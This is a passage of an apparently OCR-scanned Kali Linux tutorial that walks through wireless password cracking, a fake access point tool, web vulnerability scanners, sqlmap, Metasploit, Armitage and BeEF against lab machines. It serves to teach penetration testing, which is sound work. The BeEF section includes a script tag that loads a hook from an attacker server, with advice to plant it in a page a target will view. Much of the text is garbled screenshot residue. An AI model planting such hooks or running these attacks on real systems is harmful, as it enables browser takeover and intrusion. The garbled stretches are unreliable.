Koy Oatabo.., No KIYEnl'tH
PylhOnVIfSlon 171 d.r.u(t

Al<"ock Vorl .... AIr(m\""'l 1 1 - (e)
Ot V.""," 4 9 J
About Fern Wlfl Cr.(ker

GUt ... t. r... "".It...... ''lPtlon stllngeh t.. ~ng or 802.11 wlrete .. encryp'- ot..-.:!Md OC(u> polrWs
W,rtttnby s....... £m.. ....,tl £kllco Report Bugs at soVlOboytC!,oc .. ""..c (om
28
Kali Linux
Step 3: Click “Scan for Access Points”.
(
L_..._wl_·_'O
__ --"II:, ~_l C; ..,....
«.»
L~
Ftrn WIFI Crock.r 1.9
'ylhcnVClr.lcn: 2.'.)~fM"t
;'ir<f'3dc Ver»cn: ,.Jr<,otk ..~
01 V'f,"~: .a.9.'
1.2 ~t.)
I .li)_. I
About I"trn WI,., CrKktr
29
Kali Linux
Step 4: After finishing the scan, it will show all the wireless networks found. In this case,
only “WPA networks” was found.
Forn WlFI C.r1Ickor 1.9
~ 'ho'I Ve "kr( l 7. , do!: r.wll
""H,.ck v.~ ~''''.'''''''''9 1 l .. t.J

O,ve.t1o~.1.9)
Step 5: Click WPA networks as shown in the above screenshot. It shows all the wireless
found. Generally, in WPA networks, it performs Dictionary attacks as such.
Step 6: Click “Browse” and find the wordlist to use for attack.
30
Kali Linux
Step 7: Click “Wifi Attack”.
Step 8: After finishing the dictionary attack, it found the password and it will show as
depicted in the following screenshot picture.
31
Kali Linux
Kismet
Kismet is a WIFI network analyzing tool. It is a 802.11 layer-2 wireless network detector,
sniffer, and intrusion detection system. It will work with any wireless card that supports
raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It identifies the
networks by collecting packets and also hidden networks.
To use it, turn the wireless card into monitoring mode and to do this, type “airmon-ng
start wlan-0” in the terminal.
root@bii:"
Let’s learn how to use this tool.
Step 1: To launch it, open terminal and type “kismet”.
32
Kali Linux
Step 2: Click “OK”.
Step 3: Click “Yes” when it asks to start Kismet Server. Otherwise it will stop functioning.
Step 4: Startup Options, leave as default. Click “Start”.
33
Kali Linux
Step 5: Now it will show a table asking you to define the wireless card. In such case, click
Yes.
root@kali: N oa
ERROR: Could not open our fHe '/etc/manuf': No such fHe or d i rsc to rv
ERROR: Could not open our file '/usrlshare!wireshark/wir~shark,manuf': No
such fHe 01- directory
INFO: Open~d OUI fil~ '/lisr/share/wireshark/manuf
INFO: Ind~xing manufactur~r db
INFO: Completed indexing manufacturer db. 27350 lines 547 indexes
HIFO: CI-eating ne two rk tracKer",
HJFO: Cr-eatin
HIFO: Registe
IliFf): Pc ap 10
INFO: Opened p
H,IFO: Opened
I1IFO: Opened
I1IFO: Opened
HIFO: Opened
INFO: Kismet starting to gather packets
INFO: No packet sources defined. You MUST ADD SOME using the Kismet
client. or by placing them in the Kismet config file
(/etc/kismet/kismet.conf)
INFO: Kismet set-vel-accepted connection f rorn 127,0,0,1
Step 6: In this case, the wireless source is “wlan0”. It will have to be written in the
section “Intf” -> click “Add”.
34
Kali Linux
Step 7: It will start sniffing the wifi networks as shown in the following screenshot.
Step 8: Click on any network, it produces the wireless details as shown in the following
screenshot.
35
Kali Linux
GISKismet
GISKismet is a wireless visualization tool to represent data gathered using Kismet in a
practical way. GISKismet stores the information in a database so we can query data and
generate graphs using SQL. GISKismet currently uses SQLite for the database and
GoogleEarth / KML files for graphing.
Let’s learn how to use this tool.
Step 1: To open GISKismet, go to: Applications -> Click “Wireless Attacks” -> giskismet.
As you remember in the previous section, we used Kismet tool to explore data about
wireless networks and all this data Kismet packs in netXML files.
36
Kali Linux
Step 2: To import this file into Giskismet, type “root@kali:~# giskismet -x Kismet-
filename.netxml” and it will start importing the files.
Once imported, we can import them to Google Earth the Hotspots that we found before.
37
Kali Linux
Step 3: Assuming that we have already installed Google Earth, we click File ->Open File
that Giskismet created -> Click “Open”.
• lay.,. Eanh
" :BJ ... P!lmaoy Dec"'.s •
• ill f 6o«Ier; and labels
I- Q Places
!- • Photos
I "'R~
" L~ 30 BUildings
I!<.Oc_
['O_r
I GoNIy
The following map will be displayed.

fil9 Edil lb.... 1001. Add tlGlp
• Search
,I( ro 1 ~.... """n ..... J oll'C!lon']
~. Photos
-::: Roads
'" ~ 3D Buildings
. ·.Ocean
OWoaliler
38
Kali Linux
Ghost Phisher
Ghost Phisher is a popular tool that helps to create fake wireless access points and then
later to create Man-in-The-Middle-Attack.
Step 1: To open it, click Applications -> Wireless Attacks -> “ghost phishing”.
Step 2: After opening it, we will set up the fake AP using the following details.
 Wireless Interface Input: wlan0

 SSID: wireless AP name
 IP address: IP that the AP will have
 WAP: Password that will have this SSID to connect
39
Kali Linux
V
Vl.64
--... LI~ .', ~wl

--
[
_..._.~ ______________________________ _J
0- I
" [
Step 3: Click the Start button.
Wifite
It is another wireless clacking tool, which attacks multiple WEP, WPA, and WPS encrypted
networks in a row.
Firstly, the wireless card has to be in the monitoring mode.
Step 1: To open it, go to Applications ->Wireless Attack -> Wifite.
40
Kali Linux
I!il t.1t20161 (n.",h 11 (Runnong) 0 .. leVMVII,u"IBn

I tle MldHn~ ~ I
Step 2: Type "wifite –showb" to scan for the networks.
41
Kali Linux
Step 3: To start attacking the wireless networks, click Ctrl + C.
,,' " , ,.,'.. I
Step 4: Type “1” to crack the first wireless.
Step 5: After attacking is complete, the key will be found.
42
5. Kali Linux ─ Website Penetration Testing
Kali Linux
In this chapter, we will learn about website penetration testing offered by Kali Linux.
Vega Usage
Vega is a free and open source scanner and testing platform to test the security of web
applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting
(XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written
in Java, GUI based, and runs on Linux, OS X, and Windows.
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical
inspection. Vega can be extended using a powerful API in the language of the web:
JavaScript. The official webpage is https://subgraph.com/vega/
o upgr-aded, 0 newly installed, 0 to remove and 0 not upgraded.
0% [Connecting
: -# apt -get
update && apt -get Lns t al.L -y v<=?ga
to http.kali.orgll
Step 1: To open Vega go to Applications -> 03-Web Application Analysis ->Vega

I
Step 2: If you don’t see an application in the path, type the following command.
o upgraded, 0 newl y installed, 0 to remove and 0 not upgraded.

:-# apt-get update && apt-get lnstall -y vega
0% [Connectlng to http.kali.orgll
43
Kali Linux
Step 3: To start a scan, click “+” sign.
Applications. Pleces v D Vega. Sat 15 50
Subgraph Vega
File Scan Window Help
a
-
Website View = I::l ~can
-
Info I
6'e~s
-
_VEGA
Scan Alert Summary

<D Scan Alerts I =El
1---------1
o High (N"ne <
Step 4: Enter the webpage URL that will be scanned. In this case, it is metasploitable
machine -> click “ Next”.
Choose a target for new scan

eVEGA
Scan Target-----------------------------
~ Enter a base URIfor scan:
11192.168.1.10lJdVW~
:_', Choose a target scope for scan
I Default Scope
Web ModeL
./ Include r,revlouslydiscovered paths from Web model
I ~
< Back
!1
L-_Ne_x_t_>_ .... Cancel Finisn
44
Kali Linux
Step 5: Check all the boxes of the modules you want to be controlled. Then, click “Next”.
f setect Modules
.n.ebt.
ChOOIe whir:h '(MIn,,' modutH to for Itds "M
• VEGA
8 tnltcllon MOIM.,
~ Bait! Environm."' V.,.".. BlII'tdOS I,...coan (C'VE·»1.W17L. CY(·lOt .. 'l7I
I ./ Hnp TrICe Plobot~
FOI'm~tStrintl",ftH:'Uort chHb
../ Croll 00tI~..1n PoUcy A41dltor
." XMllnj.ction (tle,itt
I ~ Ev,I Code Injt<tIon
allr!d XP.d! InlltCtIon ch.cles

../ Blind SQI. Ttxt '1e(UOtI OIfftrtnua(. Clw<:b
~ xss I+ction c:hed(~

../ local File tr.cwdl!' th.,ics
< .... k FhI'"
Step 6: Click “Next” again in the following screenshot.
AuUUlllll(;ht!o.\ OIHloll'\'
..
....
ttWlgunl cooldt. WId....V!.nat4lOOn IOfnwy .. 11Mdumg
• VEGA
..... , Ftr!ilh
45
Kali Linux
Step 7: Click “Finish”.

w
Parameters
Add names of parameters to avoid fuzzing during scan
_VEGA
Exclude Parameters--
I;? Exclude listed parameters from scan
__viewstate
csrftoken
anticsrf
_eventtarget
__viewstateencrypted
xsrftoken
__eventargument
_eventvalldation
csrfmiddlewaretoken
~r name of parameter to exclude 'I

Add Remove
fL.....: Back Next> 1

'':___'.,,_
Cancel
Step 8: If the following table pops up, click “Yes”.
Follow Redirect?
?. Target address http://192.168.1.101ldvwa

http://l92168.1.101ldvwa/login.php
redirects to address
Would you like to add http://192.168.1.101ldvwa/logln.php to the scope?
No
II Yes
II
46
Kali Linux
The scan will continue as shown in the following screenshot.
1.' w,"'.. Vow -r
·8
.192.16l.L10l
• • VEGA
Scanner Progre.ss
"U~/!l'2.16"LIOJICfvw~~~ld~
J1 out.' 29 'K~ (51.6"")
o d... (7)
... or
·0 (.)
,
0,",0(7)
Step 9: After the scan is completed, on the left down panel you can see all the findings,
that are categorized according to the severity. If you click it, you will see all the details of
the vulnerabilities on the right panel such as “Request”, ”Discussion”, ”Impact”, and
”Remediation”.
lW.bshViaw co C <D Son Info

.. A'I A CilANtl •
m " ClasSinc:iltion
G 191.16$,1.10] Aec'101.lr<e:
Go Rblk
~ REQUEST
.. 0 fdVW'l.'.01Jln..php
o 10122/2016 15:54:02[C~
• DISC;:USSHJN
- Q http://l92166..1.101 (23)
v..'P det'<t.d ;1 form wrth a p.asnrord.-.pc.t held tha1 ~ to .an 1MKU"e(HnP) ~rgO"_
0"".(') p.$swon;l Wibf$ should ~ tKt WII '" Ulf dt¥ "M(O$S ~tQ.n <hOlMel$. i'hl$
\I\A'I~f6otlilcy cOl.lcl ,~ ItI ~ dIK~ d p"s-o"d~ to ~ nl!'lWOrt.
iClttacw~
.. S~u.lon Cookl.
.. SeJ,lon Coom • IMPACT

» Ve9:1. h:n CetrrceO .. ftnn th3t c.'1. ~ • p;au __ d ~ _ 1m !Menu.
. 0 M<d;o,. (7) (Mnn.,1.
)It 1M (oUd 1lII~1t In disdCI~e: otpau.wonts tondlfolt e~oppen .
• 01.0",(6)
·0 ..10(7)
• REM:E;OtATlON
»
."...
h..!'WOI'dl. should ~ be:s.enl _durteA.. fbe bm should stbml 10.1'1 t-RTPS
47
Kali Linux
ZapProxy
ZAP-OWASP Zed Attack Proxy is an easy-to-use integrated penetration testing tool for
finding vulnerabilities in web applications. It is a Java interface.
Step 1: To open ZapProxy, go to Applications -> 03-Web Application Analysis -> owasp-
zap.
Step 2: Click “Accept”.
rYWASPZIoI' 0&0
Ucensed under the Apache Li~nse. version 2.0.
APflCf,lOOC Il~ to 'PCI!)'\I1, 111)"1'1; Lie ..",. 10)'011' wo.1(

TO.,:jlI)t; thot Alt",nt lI(", •• to )OilY' "'Of'' . ",toe"
U\f '0'10"'1\0
bOll,rpM" I'ICKIC" ",-'U' \1'1, Nidi Inc'i).leI by "".(k.t. 'II'
"'Il't<towCI'I)'(i1l" 110m1!I.nl~np +nf~'1CI1\ tDM' "'~kld.
tn. b'lI(kehll Ill, t .... ,!Iould b, "'CIO~'II.n lite -.al)tOptI ••
(_om~1't .ynta.'(II •.,.II,.fl»'mll', WIt 01\0 ,KOmmtl'ld Ihat 0
M. or (1.'1 "'-MI ,1'111".,l(ttp!:IOfl 01 I)"PO,. ~ '""lulled (In ,n,
.~m. ·pr'!'It.d PII9'· 'a,the cof!y!l9l!t notle. 'Of" •• \llf
Idel'lllr,e:.MlO!l ~Vo;l'+ ,hI'!f.'PfI"J W'("~
CooJ"l",t IVh'YII""'1t 01 <OP'J'iII''< o"",,,e'1

U(.enSld ",ese, the "1I&tll4' IJCtn~ .. '-'trelOn 2.0 (tht "lk'1I.1e·)I
)'OU m-.y 00\ ~.l"'s liflt 'IIt'pI." (omphonCl1'I\thlll' Uteri...
"'01,1m""ob(~ a ccpyoltl'l,\J(en$-1 ill
tlttptl ......
_ apll(h',OIg,UCIIf"~'CEuse.20
Ul'dltu "ClfJlr.;d by apFlte;lbjo'iI'N 0( iI~ed 10 ... \WItnq. smw;1A

chWlbutHiulldY tht! U(en~1' I' <h\tr'blJlled on 81\•.. S 15' .8.ASs.
WnHWI' w.e..:!RAtmes OR CONomOf6 OF AIIYklteD, 'lUI" llII;I,..n or.mpl.d.
S", (!'It U<.-tMt tor ll\t ,pe(lncIIVIQlJige
~1n9 j)frMismM inel
'mlt_tlons I#Icltr IN LlC.m_,
48
Kali Linux
ZAP will start to load.
INFO:loaded filter Replace HTIP response body using deftn

ed pattern.
INFO:loaded filter Replace HTIP response header using def
ined pattern.
INFO:loaded filter Send ZAP session request 10
Step 3: Choose one of the Options from as shown in the following screenshot and click “Start”.
")\'11 SP -AP - OWASP ZAP 2.4.3 - 0

"
Elle j;dit Ylew Analyse Beport Iools Qnline !:!elp
(Stal'ldard Mode ,,.) [J C;:Hi::l ~ ~ ~ nt.!f~ ~glQl ~~gg iJ \I Q •• .. 0%1llilJ'il:a.
J ~ Sites 1 + 1 J Quick Start II 1 <4 Request 1 Response.;.. 1 + 1
®L;lElL5l
,. !51 Contexts Welcome to the OWASP Zed Attack~
C[I Default Context ZAP is an easy to use integrated penetration testing tool for finding vulner
I
I Do you want to persist
OWASPZAP
the ZAP Session?
0 ns that you nave be
press 'Attack'.
o Yes, I want to persist this session with name based on the current timestamp
o Yes, I want to persist this session but I want to specify the name and location
L o No, I do not want to persist this session at this moment in time I ._
o Remember my choice and do not ask me again.
1You can always change your decision lila the Options I Database screen
.. ;1
j a History t~ Se~ ~ I Star
I
e ~ " Filter:OFF
Id Req. TImes... Met." URL 1 Coo.1 Reason I·" I Size Resp".1 Hiqhes.i. N." Tags ~
~I
0.'
,.
Alerts FU0 ~. 0 l'!l 0 ItII 0 Current Scans ~o '" 0 ?I 0 Oo~o ~o ~o
49
Kali Linux
Following web is metasploitable with IP :192.168.1.101
:~ 0
Step 4: Enter URL of the testing web at “URL to attack” -> click “Attack”.
Untitled Session - OWASPZAP 2.4.3 000

tile !;,dit Yiew Analyse Beport Iools Qnline !::!elp
( Standard Mode
J~ Sites I+ I
·LJ ~ 10 • Im1 ~ ,eLc:!! I§
J ~ Quick Start"
mIDm;g
J~
e~E1
Request
iJ
" ~ I~
J Response~ J + ]
• 0~1ITiiI1a.
®L;l1Ll0!
• IS ConteKts Welcome to the OWASP Zed Attack~
IE Default ConteKt ZAP is an easy to use integrated penetration testing tool for finding vulner
~ flit Sites
Please be aware that you should only attack applications that you have be
To quickly test an application, enter Its URL below and press 'Attack'.
URL to attack: http://l92.168.1.101/dvwa
Progress:
I "I; ..t'ad II 0
Actively scanning (attacking)
Stop 1
the URLs discovere
~\ ./ ...,'""
I~ History JIi\ Search J pi Alerts J UI Output J ~ Spider 1 }'I Active Scan r 1+]
Il!ID ~ NewScan Progress: 10: http://192.168.1.101/dvwa ,. J 00 0 m~ Current Scans: 1 I Num requests: 0 ~
Id I Req. Timest...... Resp. Time...
...
I Met ... I URL
·,'~~'"'V1~''''9i •••
~~:.I
~eason I:::ISize Resp ... ·1Size
... 0 .... :rrrv
oy
Resp... r;
26 20/10/161... 20/10116 1... POST http://192.168.1.10l/dvwa!1ogi... 200 OK ... 382 bytes 1.26 KiB .,:
27 20/101161 ... 20/10/161... POST http://192.168.1.101Idvwa!1ogi ... 200 OK ... 382 bytes 1.26 KiB
...
28
29
30
201101161 ...
20/10/161 ...
201101161...
20/10/161...
20/10/16 1...
20110/161...
POST
POST
POST
http://192.168.1.101/dvwailogl...
http://l92.168.1.101/dvwa!1ogl...
http://l92.168.1.101Idvwa!1ogl...
200 OK
200 OK
200 OK
...
...
382
360
360
bytes
bytes
bytes
1.26
1.26
1.26
KiB
KIB
KIB
'"
~
31 20/10/161... 20/10/161... POST http://192.168.1,101/dvwa!1°9l... 200 OK ... 360 bytes 1.26 KIB •
Alerts I'JI 0 '" 1 ,-.)4 I'D 0 Current Scans W 0 Go ~ 1 @O ~o /-0 :)11:0
After the scan is completed, on the top left panel you will see all the crawled sites.
50
Kali Linux
In the left panel “Alerts”, you will see all the findings along with the description.
$tanlbns No.,.
J ... ,.. 1+1

I '5conc ...t. Welcome to the OWASP Zed Attack Proxy (ZAP
:IIO.ril\A (tnt",1 lJtI'n -" • ..,.t. lIM W't."lrIvCS ~l!.tlon l'WnQ 1001lort.ndl"ll VIIIn""IIIII,. !n .... pplk"lio
.. kup''''''61 l LOl ",;10" b.- •• ..,. U\IIl)'IIU .1wo1Honty .lt~k _""I.,lllIn. tn.. )'01ol " ..... 1>1.,. tp~!nt"l)' iI•• n 9"fr
'" Off!)M. It UN. b.low.nll ,,,.n 1011_elt'
............'I{.Ma,..""
,. ~I.tt ~ ""',,-'''''' ~.,
.G(1'lttI.....~
..",1",,,, !lOi7avn
"GCI
"".,.In
, ",,"I 10000''''
.. • (U
,. (ilF1',-, •
• !JOIT .",,-ptI~P__" hr ...... ' " ...... ,.",.., "'CS..,qJ!DI")lGU' appl!cltlon UU'l9)'OlIftllQW\11 IIUIOIMI.,d,-O'
-0" ..... 't-I •• UIInt ~.,,. 14' Of Iat-)'CMI <all \tI. '.,II.tQ.o«.ll("10 (orh"t""
(II(
)'(lUIbrow~.1'1
'.
"'"9<8197 Hill lOlldvWMo!pn php
" .. Maociul!\
~
••
Step 5: Click “Spider” and you will see all the links scanned.
.-=-1 - I,.
I" MdtOIY "S.antl AlMtt I o~
> "'"1._.
I..,CIIdIr I ".UriSc.tnl+l
."
~N"StIlf"l Prt1!'UIII'_tap,l1nl".u~ • _":C ,

,,,D
F1aof
••
It
hr.p:.l1.jz.lal_10~
hnptll "1.1 ea-t-.IOurobr:lt.s..na
~V2_lal.10l/'Pl,",iIP·"
........
•• hnp.ll'l+l.l.IOl~
hnP;61J1IA.II01~"
•
It
• hup;"f11a'.IOl~'''''09I!\'-'''s
hnp6lt1latl(llllMr~)I)_,P""
~.IIf11A.llOl~H(!tI"'",S'0I"Il'I •.•
Database Tools Usage
sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
Let’s learn how to use sqlmap.
51
Kali Linux
Step 1:To open sqlmap, go to Applications -> 04-Database Assessment -> sqlmap.
The webpage having vulnerable parameters to SQL Injection is metasploitable.
•
!7, 0 ..
Mutillidae: Born to be Hacked

Hinl.~ OO•• .....t1O .11rj"h.r.. -)- _I..agaed In
VIew our detailS
Please enll!'r UHmIlmI! and pauword

to v1tw account detJlllS
y,... AGCOUM 0IaI'ft,
Ii" DofX""WI"f1'aca:J1mt"~u$o"~t~~
~1Id. .... rt _""ollty.
'"* with '--NIl
wn:.e.c_l<,
f1r~ a...p. ... "-,
MItItM, INIIhls.I
"'0:111. MokIt
En'Ot ~~
• ..... _
qll"'Y You hf\'l) un "'lOt .. ~"$OI
...... I ._ .........-
~yrrtlllC ~
.",.n .... _ _...._,.. .. .._ f
r>e m.IUf _ ClOI!t><jXl<ldo
to 1'0'" ~t1SQI 5'lr~
Step 2: To start the sql injection testing, type “sqlmap – u URL of victim”
. :,__ , -
: .-# sq1map -u http://192 .168.1 .1Gl/muti11idae/index . php ?page=use r- info.
- I
~hp.~~;~e...r~~m~.~2?~a.~.:~~ ~~~&.~;;.~
-,~~
~,~
:l'~~.:.:.u?~~ ~~~~~~t,.on~_V.~~ count +Det ai 1 sl
52
Kali Linux
Step 3: From the results, you will see that some variable are vulnerable.
sqlninja
sqlninja is a SQL Injection on Microsoft SQL Server to a full GUI access. sqlninja is a tool
targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft
SQL Server as its back-end. Full information regarding this tool can be found on
http://sqlninja.sourceforge.net/
Step 1: To open sqlninja go to Applications -> 04-Database Assesment -> sqlninja.
53
Kali Linux
CMS Scanning Tools
WPScan
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote
WordPress installations to find security issues.
Step 1: To open WPscan go to Applications -> 03-Web Application Analysis -> “wpscan”.
The following screenshot pops up.
root@kall: '" OG)O
54
Kali Linux
Step 2: To scan a website for vulnerabilities, type “wpscan –u URL of webpage”.
If the scanner is not updated, it will ask you to update. I will recommend to do it.
Once the scan starts, you will see the findings. In the following screenshot, vulnerabilities
are indicated by a red arrow.
55
Kali Linux
Joomscan
Joomla is probably the most widely-used CMS out there due to its flexibility. For this CMS,
it is a Joomla scanner. It will help web developers and web masters to help identify possible
security weaknesses on their deployed Joomla sites.
Step 1: To open it, just click the left panel at the terminal, then “joomscan –
parameter”
Step 2: To get help for the usage type “joomscan /?”
:-# Joomscan ;71
Step 3: To start the scan, type “ joomscan –u URL of the victim”.
56
Kali Linux
Results will be displayed as shown in the following screenshot.
SSL Scanning Tools

TLSSLed is a Linux shell script used to evaluate the security of a target SSL/TLS (HTTPS)
web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is
based on the openssl library, and on the “openssl s_client” command line tool.
57
Kali Linux
The current tests include checking if the target supports the SSLv2 protocol, the NULL
cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong
ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS
renegotiation capabilities.
To start testing, open a terminal and type “tlssled URL port“. It will start to test the
certificate to find data.
root@kali: - 000
You can see from the finding that the certificate is valid until 2018 as shown in green in
the following screenshot.
[.J T~sting for the certificate CA issuer

Issue r: COI'10DORSA Domain Val idation Sec u re Se rver CA
[.J Testing for the certificate validity period ...

Today: Sat Oct 22 19:27:24 UTC 2016
Not valid before:
Not valid a f t e r:
[.J Checking pr~ferred s~rver ciphers ...
[OJ Testing for SSLiTLS renegotiation MitM vuln. (CVE-2GG9-3555)
[+ J Tes t i nq for 5'?cur-~r~n~gotiation suppor-t (RFC 5746) ...

Secure R~negotiation IS NOT support~d
[+J Testing for SSL/TLS renegotiation DoS vuln. (CVE-2011-1473)
[.J Testing for client initiated (CI) SSL/TLS renegotiation (insecure) ...
UNKI~O'wN
['J Testing for client authentication using digital certificates ...
58
Kali Linux
w3af
w3af is a Web Application Attack and Audit Framework which aims to identify and exploit
all web application vulnerabilities. This package provides a Graphical User Interface (GUI)
for the framework. If you want a command-line application only, install w3af-console.
The framework has been called the “metasploit for the web”, but it’s actually much more
as it also discovers the web application vulnerabilities using black-box scanning
techniques. The w3af core and its plugins are fully written in Python. The project has more
than 130 plugins, which identify and exploit SQL injection, cross-site scripting (XSS),
remote file inclusion and more.
Step 1: To open it, go to Applications ->03-Web Application Analysis –> Click w3af.
Step 2: On the “Target” enter the URL of victim which in this case will be metasploitable
web address.
W.J"# - w.o I'ppuraaan Att.ICJr.-sGJIWCIC ~ OJ. ,
Proill.. EdIl Tools Cor!~ Hflp
p .. n o •••
~~<~
I ProI\I.-t fX~~~C===C==f===============================================
T.wget:. 1!U.l£!U...lO~
~.-,.;w.."1..aoJM
.....
OW"SP _TOP100
.. dlt..hII)k..m1c
bnMfou._
~ ..
hNt.ftwc"
lull.
lull.
dIt
~.pIIW,..tIU'I
._..........
'1"'.
''',,1'\. 1n" ..
.......
tJ'u(~I •
...."b.Jn"utnK"-', •
n... ....., ..... ttw. .... c:.....
_ ..,.,~.-n"'_
... -.....
"'B .."","
59
Kali Linux
Step 3: Select the profile -> Click “Start”.

W;)a '"n-cu "........""'_ ...... __ ,.,.".....,.. V 'CI ....
ProliH edit TOQIs C(ll1lli~ ""p

• o
Tlln)tt
..."...
192.l6&.l....10~. _
Ani.,. '''-J''
OWASP_TOPIO 8 .....
~!tJe'9h_mt ~ '" bllnd~t..
bNl~(Il'(e buW.r __ rftow
tlt:e,,,1IP
_b .....franruewr. .' ".~plCWId 1M JIW9ft fIfIck ¥I-ebD;\V~.uon ~ """. ",nn 41ft
.......... ....., ,....,., ..,_.("~~,..

.noon. To ct.dl fat tdI t 'm._1hII
thlIrI. w.b apfII.Ic.*"
kIMl,the pkI", will 'flY
"OIIttl"'" _ "" ... ..., "~,,, h. Wt-bOAV t'".bt.-.If tI'Ht fie ..
MCI.,. '1NrJ" ~ .. c~d",""III .... hao ... rOlollld.bo;g,
8 output
Step 4: Go to “Results” and you can see the finding with the details.
waae . - . I"">
!~.. 1'1
sca"tor-'IJ ~ L~.,lolt
KQero~ VALl ~eq"'6~DOr$e nilij?IO! _ _ _
II\I'\JI;" .'",0 I MIS< "QlI~ft. I" IIuoknlWo'lt:l31'-1),,5otW,.~r(lund .t:'htt":I/~I"$(!"'ldltJsq'_lrIJ("(lj0j

selec:t/sQI \rfectlon ~t'l~ PM-, -usmqHTTP tMtho<i GET.'The ser:tdatawes: 'n;me--d'.f.17z
'110220'. rtll!. w!t"ef <tb.bly W4!oro .....d lit It-.e, toque" With id 112!J..
1')
(l:l)
I')
• \.~Il (' ) '<q.dl "Tf"~'--------------------------------------.
Be SQI. '4f«10n - t<tid .. , ~ __
DO Sc;t.1'll«tl., HttP,-l.l ,!OW~
COf'IlClftt·lOll!J1": :)0,
COftttlftl-e.llcodlJI9: g2'lp
1-p"""e~d-by: PtlP/5.!. 10·!ubuntu.).4
vary: Accept·En<oainq
server; ~pa<n~/2 1 II (UbU~tu'
d~t.: $91, 19 J~ft 20]l 10:)7118 GMT
COfttOftt.~yp.l ~~.~/ht"l
'tx<~p'l(Jn' ",ilh ftt:'IUI9~ C'lOt

vM(@nile-'atZ"": ...bl I
SOt syntax; cn!c~ t"henarwal
that (orrespoftd~ to your HVSOl server verSlon for t~e rlQht
$ynt~x to U$C ~ir '~·O ' ~t \~Ot l' 1n lyar~~4IIIIVwBat/aud~tl
iQ\_ln]O(i i0fl/5c:lc(t/~lll_ln)('liC)" _stnno phPll:i
Slnck ,...r-rt
.0 CtlAlnl
,ht0V'l1 In l"'l'It/"'_I_wJ.r/lllld~l/sq\ _n)ectlon/sele<;ll
sqt ..fI)I!CllOfl !It(ifl9 php on lLfle l5
60
6. Kali Linux ─ Exploitation Tools Kali Linux
In this chapter, we will learn about the various exploitation tools offered by Kali Linux.
Metasploit
As we mentioned before, Metasploit is a product of Rapid7 and most of the resources can
be found on their web page https://www.metasploit.com. It is available in two versions -
commercial and free edition. The differences between these two versions is not much
hence, in this case we will be using the Community version (free).
As an Ethical Hacker, you will be using “Kali Ditribution” which has the Metasploit
community version embedded, along with other ethical hacking tools which are very
comfortable by saving time of installation. However, if you want to install as a separate
tool it is an application that can be installed in the operating systems like Linux, Windows
and OS X.
First, open the Metasploit Console in Kali. Then, go to Applications -> Exploitation Tools ->
Metasploit.
,I
61
Kali Linux
After it starts, you will see the following screen, where the version of Metasploit is
underlined in red.
Terminal 000
In the console, if you use help or ? symbol, it will show you a list with the commands of
MSP along with their description. You can choose based on your needs and what you will
use.
62
Kali Linux
Another important administration command is msfupdate which helps to update the

metasploit with the latest vulnerability exploits. After running this command in the console,
you will have to wait several minutes until the update is complete.
It has a good command called “Search” which you can use to find what you want as shown
in the following screenshot. For example, I want to find exploits related to Microsoft and
the command can be msf >search name:Microsoft type:exploit.
Where “search” is the command, ”name” is the name of the object that we are looking for,
and “type” is what kind of script we are looking for.
63
Kali Linux
Another command is “info”. It provides the information regarding a module or platform

where it is used, who is the author, vulnerability reference, and the payload restriction
that this can have.
Armitage
Armitage GUI for metasploit is a complement tool for metasploit. It visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features.
Let’s open it, but firstly metasploit console should be opened and started. To open
Armitage, go to Applications -> Exploit Tools -> Armitage.
64
Kali Linux
Click the Connect button, as shown in the following screenshot.
When it opens, you will see the following screen.

•. , rml a e '!' ~ I<
.d",ln
·lil'Ctp
..!l tOI!)(;lt_ad"'IMflt.r.ltlOn
to,""OIt_Utfe_tT_ru+
.it .t",n",
'iii .....
Modules
Armitage is user friendly. The area “Targets” lists all the machines that you have
discovered and you are working with, the hacked targets are red in color with a
thunderstorm on it.
65
Kali Linux
After you have hacked the target, you can right-click on it and continue exploring with
what you need to do such as exploring (browsing) the folders.
nll0<10.oA 10:; 33i ~OO

201~()';;''):Ol..0400
2010.02·1.22:21 )) ~
In the following GUI, you will see the view for the folders, which is called console. Just by
clicking the folders, you can navigate through the folders without the need of metasploit
commands.
On the right side of the GUI, is a section where the modules of vulnerabilities are listed.
YJrIitage :0ew H2sts Attas_ks

fjjj auxiliary
"Iii admln
"Iii http
~ tomcat_admlnlstratlon
~ tomcat_utf8_traversal
"Iii scanner
"Iii http
~ tomcat_enum
CJtomcat_mgr _Iogin
" (Ii exploit
"1& multi
"Iii http
iii tomcat_mgr_deploy
Modules
BeEF
BeEF stands for Browser Exploitation Framework. It is a penetration testing tool that
focuses on the web browser. BeEF allows the professional penetration tester to assess the
actual security posture of a target environment using client-side attack vectors.
First, you have to update the Kali package using the following commands:
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
66
Kali Linux
To start, use the following command:
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef
Open the browser and enter the username and password: beef.
At' .......
............. beef
-- beef
The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client
browsers. When it does, it calls back to the BeEF server communicating a lot of information
about the target. It also allows additional commands and modules to be ran against the
target. In this example, the location of BeEF hook is at
http://192.168.1.101:3000/hook.js.
67
Kali Linux
In order to attack a browser, include the JavaScript hook in a page that the client will view.
There are a number of ways to do that, however the easiest is to insert the following into
a page and somehow get the client to open it.
<script src="http://192.168.1.101:3000/hook.js"
type="text/javascript"></script>
Once the page loads, go back to the BeEF Control Panel and click “Online Browsers” on
the top left. After a few seconds, you should see your IP address pop-up representing a
hooked browser. Hovering over the IP will quickly provide information such as the browser
version, operating system, and what plugins are installed.
To remotely run the command, click the “Owned” host. Then, on the command click the
module that you want to execute, and finally click “Execute”.
tI BeC:P 0.4.4,klphp I Submit Bua l.s!riI2!I1

oI<ccIlIrowfcr$ _
IGc!J11lIl SlGrtcld Current DrowNr
II
